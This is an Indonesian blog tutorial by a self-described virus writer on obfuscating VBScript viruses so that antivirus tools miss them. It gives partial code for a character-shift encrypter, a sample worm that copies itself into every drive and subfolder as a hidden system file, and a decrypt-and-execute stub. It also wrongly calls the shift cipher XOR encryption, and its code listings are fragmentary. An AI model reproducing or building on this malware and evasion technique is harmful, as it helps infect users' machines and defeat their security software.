Melihat banyaknya email dan forum yang menanyakan cara mengenkripsi virus vbs atau js,maka saya mau menulis tutorial cara mengenkripsi virus vbs. Bila anda menggunakan program atau script encrypter maka virus kamu akan didetect oleh antivirus sebagai Encrypter.Tools atau Encrypter.Gen. Untuk itu saya akan memberitahu cara enkripsi sederhana dan kamu dapat memilih sendiri karakter ASCII nya.
Prinsip kerjanya begini, baca file perkarakter lalu ubah karakter demi karakter menjadi karakter ASCII(nomor ASCII +2). Jadi hasilnya, setiap huruf akan ditulis sebagai 2 huruf didepannya dalam tabel ASCII. Untuk unencrypt nya kamu cukup membalikan cara kerja encrypter tadi, yaitu mengurangkan karakter ASCIInya dengan 2. Lalu mengeksekusi yang telah di unencrypt tadi. Teknik ini disebut enkripsi XOR.Pusing ya.. hehehe saya juga pusing
untuk meng enkripsi kamu harus mengubah semua karakter ” menjadi karakter ASCII lain, seperti ä,ö,æ,Æ,ô,ò dll. Tapi kamu harus tau berapa angka ASCIInya maka dari itu pertama kamu butuh table ASCII. ;Þ~
Pertama, ketikan script dibawah ini untuk membuat tabel ASCII. Nah kamu bisa memilih karakter ASCII sesuai pilihanmu.
03 | x=x+ "angka " &i& " --> " &chr(i)&vbcrlf |
06 | Set Anton = CreateObject( "Scripting.FileSystemObject" ) |
07 | Set hilman=anton.createtextfile( "C:\ascii.txt" ) |
Lalu simpan dengan nama ascii.vbs dan jalankan. maka di drive C: akan terdapat file ascii.txt dan didalamnya terdapat angka beserta bentuk huruf ASCIInya dari 0 sampai 256(range ini bisa kamu pilih sendiri). Nah udah liat kan, sekarang buka virusmu ketik Ctrl+H(Replace). Isikan ” pada Find what dan ¤ pada Replace with. Klik Replace All dan Save. Kamu harus tau berapa angka ASCII ” dan ¤(caranya ya liat tabel tadi ;Þ)
…
angka 34 –> ”
angka 164 –> ¤
…
Catatan : “jangan memilih kode ASCII yang telah ada dalam virus kamu, karena bila di enkripsi maka akan ikut diubah menjadi tanda kutip(“).
Kedua, sekarang saatnya kita buat script encrypternya hehehe.. buka text editor kamu dan ketik script berikut :
02 | Set Anton = CreateObject( "Scripting.FileSystemObject" ) |
03 | Set maVero=Anton.OpenTextFile( "C:\suriv.vbe" ) |
07 | For I = 1 To Len(virus) |
08 | Baca = Asc(Mid(virus, I, 1)) |
25 | Set hilman=anton.createtextfile( "C:\hasil.txt" ) |
‘ini contoh file C:\suriv.vbe yang dipakai pada encryptor di atas.
03 | Set ElkaUNP = CreateObject( "Scripting.FileSystemObject" ) |
04 | Set Padang = ElkaUNP.OpenTextFile(Wscript.ScriptFullName,1) |
06 | Set Drives = ElkaUNP.Drives |
07 | For each Drive in Drives |
14 | Set Elektronika = ElkaUNP.GetFolder(Target) |
15 | SumBar = Target & "\ElkaUNP.vbs" |
16 | if (SumBar <> "ElkaUNP.vbs" ) then |
17 | Set FT_UNP = ElkaUNP.CreateTextFile(SumBar) |
21 | Set Atribut = ElkaUNP.GetFile(SumBar) |
22 | Atribut.Attributes = 35 |
25 | For Each SubFolder in Elektronika.SubFolders |
26 | Periksa(SubFolder.Path) |
Pada script diatas ada 3 karakter yang saya ubah jadi karakter ASCII. yaitu karakter :
164 jadi 215
10 jadi 28
13 jadi 29
(liat aja di tabel..;Þ~ huruf apa itu) dan selain yang tiga karakter itu, angka ASCII karakter-1(jika yang terbaca 40 maka diubah jadi chr(39) –> 40-1=39). Hasil file virus kamu yang telah di enkripsi akan ada di C:\Hasil.txt
Ketiga, copy isi file ‘C:\Hasil.txt’ dan buat script encrypter berikut ini :
02 | Explorer="pastekan isi file C:\Hasil.txt diantara tanda kutip ini. Nah karena tanda kutip ini lah |
03 | saya menyuruh kamu menukar tanda kutip dengan yang lain, karena script tidak akan jalan kalau ada |
06 | For I = 1 To Len(Explorer) |
07 | Internet = Asc(Mid(Explorer, I, 1)) |
14 | ElseIf Internet = 28 Then |
16 | ElseIf Internet = 29 Then |
19 | Windows = Chr(Internet + 1) |
21 | Microsoft = Microsoft & Windows |
24 | Set Anton = CreateObject( "Scripting.FileSystemObject" ) |
25 | Set hilman=anton.createtextfile( "c:\hasilx.txt" ) |
sekarang lihat file C:\hasilx.txt nah bandingkan dengan virus yang belum di enkrip, sama? kalau sama berarti tak ada error dalam enkripsinya.
Terakhir, tambahkan execute pada akhir unencryptor sehingga menjadi seperti dibawah ini:
03 | Explorer="&;,,,,,,,,,Z `v`k bnmsng jncd x`mf `j`m ch dmbqxos \,,,,,,,,,,,,= Nm Dqqnq Qdrtld Mdws |
04 | Rds Dkj`TMO < Bqd`sdNaidbs |
05 | qhos-RbqhosEtkkM`ld+0( Jncd < O`c`mf-Qd`c@kk Rds Cqhudr < Dkj`TMO-Cqhudr Enq d`bg Cqhud hm Cq |
06 | hudr he Cqhud-hrQd`cx sgdm Odqhjr` |
07 | Nm Dqqnq Qdrtld Mdws Rds Dkdjsqnmhj` < Dkj`TMO-FdsEnkcdq |
09 | TMO-Vqhsd Jncd ES^TMO-Bknrd ES^TMO < ×× Rds @sqhats < Dkj`TMO-FdsEhkd |
10 | hats-@ssqhatsdr < 24 RtlA`q < ×Dkj`TMO-uar× Dmc he Enq D`bg RtaEnkcdq hm Dkdjsqnmhj`-RtaE |
12 | mbqxos \,,,,,,,,,,,,= " |
15 | For I = 1 To Len(Explorer) |
16 | Internet = Asc(Mid(Explorer, I, 1)) |
19 | ElseIf Internet = 28 Then |
21 | ElseIf Internet = 29 Then |
24 | Windows = Chr(Internet + 1) |
26 | Microsoft = Microsoft & Windows |
Sekian dulu tuturial enkripsi virus VBS ini sebagai jawaban atas semua email yang
menanyakan encryptor untuk virusnya sendiri. Dengan sedikit kreatif kamu bisa membuat encryptor kamu sendiri dari pengembangan encryptor di atas. Tutorial ini juga sebagai jawaban atas kurang jelasnya cara mengenkripsi virus yang terdapat saat ini. Terutama pada para pemula yang ‘agak’ butuh penjelasan panjang lebar.
Greet’s to :
- Indonesian Virus Writer dimana saja khususnya spidey yang suka membagi ilmunya hehehe.. :Þ~
- SECTOR’S team,SevenC,dan pembuat virus VBS.Redlof dimanapun kamu berada.
- Anak Warnet Payakumbuh(RiNaL,antho,alvin-s,peri,si bos,pak guru,yudi,ade dll)
- MinangCrew, Kadal_Punk, Joehuntters, Aulia Abrar, Aldi_Member, Ridho(Elka02UNP), Adriyan, Bob dll.
- Buat semua Anak Teknik Elektronika/Fakultas Teknik /UNP /Padang /SumBar /Indonesia.
- Yance,Ee(toemis),Adek,Ata,Dodi(Bolot). hidup Payobasuang! dan yang tak tersebut namanya…
Salam.
No comments:
Post a Comment